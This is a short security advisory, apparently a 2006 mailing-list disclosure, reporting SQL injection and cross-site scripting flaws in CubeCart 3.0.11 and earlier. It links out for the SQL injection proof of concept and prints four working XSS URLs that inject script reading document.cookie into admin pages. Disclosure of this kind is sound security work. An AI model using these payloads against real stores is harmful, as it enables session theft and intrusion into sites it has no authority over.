CubeCart <= 3.0.11 SQL injection & cross site scripting

rgod Thu, 17 Aug 2006 09:30:09 -0700

--------------------------------------------------------------------------------


CubeCart <= 3.0.11 SQL injection & cross site scripting

software:

site: http://www.cubecart.com/site/home/

description: "CubeCart is an eCommerce script written with PHP & MySQL. With

CubeCart you can setup a powerful online store as long as you have hosting

supporting PHP and one MySQL database."

--------------------------------------------------------------------------------


i) sql injection:

poc exploit and explaination here:

http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html

and here:

http://retrogod.altervista.org/cubecart_3011_sql.html

the issue could affect other payment modules in modules/gateway/ folder


ii) multiple xss:


http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=";><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&x=";><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&y=";><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/login.php?email=";><script>alert(document.cookie)</script>


--------------------------------------------------------------------------------

rgod                                                           17/08/20067.15.36


site: http://retrogod.altervista.org

mail: rgod at autistici.org

original advisory: http://retrogod.altervista.org/cubecart_3011_adv.html

--------------------------------------------------------------------------------

CubeCart <= 3.0.11 SQL injection & cross site scripting

Reply via email to